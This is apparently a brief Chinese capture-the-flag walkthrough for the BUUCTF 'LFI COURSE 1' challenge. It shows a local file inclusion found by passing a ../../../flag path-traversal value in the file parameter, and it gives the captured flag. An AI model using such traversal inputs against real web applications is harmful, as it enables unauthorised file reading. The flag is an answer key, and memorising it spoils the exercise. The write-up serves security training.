BUU LFI COURSE 1

靶场教程

1.开局界面,已给出源代码。
BUU LFI COURSE 1_第1张图片
2.存在文件包含include ,直接通过传参 file 进行获取 flag。
BUU LFI COURSE 1_第2张图片
3.通过访问 url 发现报错,说明 flag 并不在当前目录下,只需要向前访问目录即可。
BUU LFI COURSE 1_第3张图片

http://b6ed0fd6-c852-40d0-b285-32d9d00fbf00.node5.buuoj.cn:81/?file=../../../flag

flag{59132e77-fb4e-455f-b7e7-21ea02be8bd8}

你可能感兴趣的:(BUUCTF,web安全,安全,安全性测试,前端)